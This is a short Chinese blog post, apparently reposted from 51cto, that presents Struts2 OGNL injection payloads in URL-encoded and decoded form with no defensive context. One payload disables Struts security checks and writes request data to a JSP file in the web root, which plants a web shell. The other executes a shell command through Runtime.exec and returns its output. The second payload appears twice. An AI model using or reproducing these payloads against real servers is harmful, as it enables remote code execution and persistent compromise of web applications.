Struts2远程执行漏洞
第一种***方式:新建一个文件,在文件中写入一下自己的东西加上&data=要写入文件he1p.jsp文件中的内容
***地址?class.classLoader.jarPath=(
%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean(false)%2C+
%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C+
%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C+
%23sb%3Dnew+java.lang.StringBuffer()%2C+%23sb.append(%23req.getRealPath("/"))%2C+
%23sb.append("he1p.jsp")%2C+%23fos%3Dnew+java.io.FileOutputStream(%23sb.toString())%2C+
%23fos.write(%23req.getParameter('data').getBytes())%2C+
%23darky%3D%40org.apache.struts2.ServletActionContext@getResponse().getWriter()%2C+
%23darky.println("suceessful")%2C+
%23darky.close()%2C+
%23fos.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]
转义后的源码:
***地址?class.classLoader.jarPath=(
#context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+
#_memberAccess["allowStaticMethodAccess"]=true,+
#req=@org.apache.struts2.ServletActionContext@getRequest(),+
#sb=new+java.lang.StringBuffer(),+
#sb.append(#req.getRealPath("/")),+
#sb.append("he1p.jsp"),+
#fos=new+java.io.FileOutputStream(#sb.toString()),+
#fos.write(#req.getParameter('data').getBytes()),+
#darky=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),+
#darky.println("suceessful"),+
#darky.close(),+
#fos.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]
第二种***方式,执行CMD命令
***地址?class.classLoader.jarPath=(
%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D+new+java.lang.Boolean(false)%2C+
%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C+
%23darky%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C+
%23myret%3D%40java.lang.Runtime%40getRuntime().exec("ls -la")%2C+
%23is%3D%23myret.getInputStream()%2C+
%23s%3D+new+java.util.Scanner(%23is).useDelimiter("\\A")%2C+
%23darky.println(%23s.next())%2C+
%23darky.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]
转义后的地址
***地址?class.classLoader.jarPath=(
#context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+
#_memberAccess["allowStaticMethodAccess"]=true,+
#darky=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),+
#myret=@java.lang.Runtime@getRuntime().exec("ls -la"),+
#is=#myret.getInputStream(),+
#s=+new+java.util.Scanner(#is).useDelimiter("\\A"),+
#darky.println(#s.next()),+
#darky.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]
***地址?class.classLoader.jarPath=(
#context["xwork.MethodAccessor.denyMethodExecution"]=+new+java.lang.Boolean(false),+
#_memberAccess["allowStaticMethodAccess"]=true,+
#darky=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),+
#myret=@java.lang.Runtime@getRuntime().exec("ls -la"),+
#is=#myret.getInputStream(),+
#s=+new+java.util.Scanner(#is).useDelimiter("\\A"),+
#darky.println(#s.next()),+
#darky.close()
)(aa)&x[(class.classLoader.jarPath)('aa')]
转载于:https://blog.51cto.com/abao0918/1439049